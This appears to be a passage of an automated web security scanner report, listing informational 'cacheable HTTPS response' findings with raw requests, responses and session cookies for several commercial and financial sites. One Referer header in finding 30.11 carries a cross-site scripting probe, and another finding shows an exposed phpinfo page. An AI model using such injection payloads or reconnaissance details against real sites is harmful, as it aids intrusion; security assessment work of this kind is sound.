Set-Cookie: TIDT=173.193.214.243.1303614799031159; path=/; domain=.trustedid.com
Last-Modified: Wed, 20 Oct 2010 21:25:54 GMT
ETag: "110792-50d-deadc80"
Accept-Ranges: bytes
Content-Length: 1293
Cache-Control: max-age=28800
Expires: Sun, 24 Apr 2011 11:13:19 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Vary: Accept-Encoding

User-agent: *
Disallow: /aolidm/
Disallow: /aolidmplus/
Disallow: /account.php
Disallow: /ajax/
Disallow: /alpac.php
Disallow: /aolidm/
Disallow: /aolidmplus/
Disallow: /aolmyaccount.php
Disallow: /bi
...[SNIP]...

30. Cacheable HTTPS response  previous  next
There are 27 instances of this issue:


30.1. https://cam.infusionsoft.com/cart/process  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/process

Request

GET /cart/process?packageCode=standard&affiliate=0 HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Referer: http://www.infusionsoft.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C137FB5113EEA15E639C83767C422E04; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 33219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...

30.2. https://cam.infusionsoft.com/cart/purchase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /cart/purchase

Request

GET /cart/purchase HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; JSESSIONID=A4215DE137CDBD905410D00F870D2667; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FE830B0B251F8F6E90E35B3648DF48C8; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 8145
Date: Mon, 25 Apr 2011 01:46:25 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
                       "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Infusionsoft - Purchase Infusionsoft</title>
<link rel="stylesheet" href="http
...[SNIP]...

30.3. https://cam.infusionsoft.com/login/auth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cam.infusionsoft.com
Path:   /login/auth

Request

GET /login/auth HTTP/1.1
Host: cam.infusionsoft.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; JSESSIONID=694DD931C6D8D8F6172B3D402F920BD2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 2629
Date: Mon, 25 Apr 2011 01:39:53 GMT

<html>
   <head>
       <title>Login</title>
<link rel="stylesheet" href="/css/main.css"/>
<link rel="stylesheet" href="/css/CAM_template.css"/>
<link rel="shortcut icon" href="/images/favicon.ico
...[SNIP]...

30.4. https://login.silverlight.net/login/createuser.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ocpzfo45cjdd3er2s2e2k155; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:14 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:14 GMT
Content-Length: 9052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

30.5. https://membership.identitymonitor.citi.com/Signup1Enroll_vrtl.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://membership.identitymonitor.citi.com
Path:   /Signup1Enroll_vrtl.aspx

Request

GET /Signup1Enroll_vrtl.aspx?source=IMN00518&ordsrc= HTTP/1.1
Host: membership.identitymonitor.citi.com
Connection: keep-alive
Referer: https://membership.identitymonitor.citi.com/pages2/english/neworder.asp?source=IMN00518&ordsrc=
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3Dno%2520value%7C1303676167327%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dundefined%255E%255Ehttp%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255Eundefined%2520%257C%2520http%253A%252F%252Fwww.identitymonitor.citi.com%252Fimg%252FIMN00564%252Fad1.gif%255E%255E%3B%20s_sq%3Dprod%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.identitymonitor.citi.com%2525252F%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmembership.identitymonitor.citi.com%2525252Fpages2%2525252Fenglish%2525252Fneworder.asp%2525253Fsource%2525253DIMN00518%25252526ordsrc%2525253D%252526ot%25253DA%3B; ASPSESSIONIDQGSTCDCS=NOKJGOOBBAPMNICJHBCBPMKN; ASP.NET_SessionId=mmdqcaqss51pck550h114y45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2770
Content-Type: text/html; charset=iso-8859-1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=; path=/; secure
Date: Sun, 24 Apr 2011 20:09:28 GMT

<HTML>
<HEAD>
<TITLE>Expired Session</TITLE>
<meta http-equiv="expires" content="0">
<link rel="stylesheet" type="text/css" href="../../stylesheets/intersections.css">
</HEAD>
<body bgcolor="#ffffff"
...[SNIP]...

30.6. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; JSESSIONID=0000z5WV0GvXASukTy2upqG-lc0:14ia6c7a4; MATFSI=IPCFSI::true~BBV::~; NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b; sroute=655231498.58660.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:54:09 GMT
Server: IBM_HTTP_Server
Keep-Alive: timeout=15, max=77
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

30.7. https://portal.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

30.8. https://portal.actividentity.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /images/favicon.ico

Request

GET /images/favicon.ico HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2; __utmc=262184092; __utmb=262184092.1.10.1303677833

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 25 Aug 2009 15:46:42 GMT
ETag: "5001ed-57e-471f93da71c80"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................W....................i..>...?.......@...h... q...l..........X.......O...Q.......z...(w..r.......6..`.......................e....j..H.
...[SNIP]...

30.9. https://protect724.arcsight.com/themes/arcsight/images/arc_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://protect724.arcsight.com
Path:   /themes/arcsight/images/arc_favicon.ico

Request

GET /themes/arcsight/images/arc_favicon.ico HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; BIGipServerPool_97_SM11-7001=1108904202.22811.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:31:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 20 Jan 2011 23:35:36 GMT
Etag: "4.0.12 -608597e25c5f54b8256b1f04c85fc2b5-894"
X-JAL: 1
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1334 t=1303677087709046
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 894

..............h.......(....... ..............................................................................................GK.................................................FI......................
...[SNIP]...

30.10. https://psr.infusionsoft.com/AddForms/processFormSecure.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /AddForms/processFormSecure.jsp

Request

POST /AddForms/processFormSecure.jsp HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
Cache-Control: max-age=0
Origin: http://www.positivesearchresults.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 213

infusion_xid=b022f83af8b7aceafab573cd5cfaa3b2&infusion_type=CustomFormWeb&infusion_name=New+Web+Form+With+Phone+%23&Contact0FirstName=&Contact0Email=&Contact0Phone1=&infusion_custom_CommentsOptional=&
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=27AD6D50295D478668130E7C85EE217F; Path=/; Secure; HttpOnly
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:36:47 GMT
Content-Length: 2153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatib
...[SNIP]...

30.11. https://psr.infusionsoft.com/files/blank.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /files/blank.jsp

Request

GET /files/blank.jsp HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/template/divFiller.jsp?divName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006FA)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 25 Apr 2011 13:29:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 01:29:25 GMT


30.12. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Request

GET /cart/ HTTP/1.1
Host: secure.krypt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utmb=218737475.6.10.1303662879;

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 16:55:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:55:30 GMT; path=/; domain=.krypt.com
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...

30.13. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...

30.14. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...

30.15. https://vault.krypt.com/phpinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /phpinfo.php

Request

GET /phpinfo.php HTTP/1.1
Host: vault.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); UBERSID=5tmog719be1801lsop4imj2so6; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.7.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:46:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h
...[SNIP]...

30.16. https://www.credit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.credit.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.credit.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ex=174a3c15; JSESSIONID=cefKL-PCj0eOzdZlgdj_s; cuc=1303674383496*http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default; st=-7286327643316513930; crc=

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:25 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "4tdt0ChAckA"
Last-Modified: Wed, 20 Apr 2011 23:59:54 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:13:30 GMT
Keep-Alive: timeout=8
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 1406

..............h.......(....... .................................t..t$......r!......................y-..j........z.......^.......\..y,...L..h................@......`........u..............~4...G..m...^
...[SNIP]...

30.17. https://www.discountasp.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.discountasp.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.discountasp.net
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qcipgv45ri0zgf3qhp4uir45; safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843; safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 03 Sep 2010 23:11:50 GMT
Accept-Ranges: bytes
ETag: "07f7963bd4bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:58:57 GMT
Content-Length: 1410

...<html>
<head>
   <title>Web Page Not Found</title>
</head>

<style>
<!--
BODY {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt}
TD {font-family: Verdana, Arial, Helvetica,
...[SNIP]...

30.18. https://www.discountasp.net/tfs/signup/package.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.discountasp.net
Path:   /tfs/signup/package.aspx

Request

GET /tfs/signup/package.aspx HTTP/1.1
Host: www.discountasp.net
Connection: keep-alive
Referer: http://www.discountasp.net/tfs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
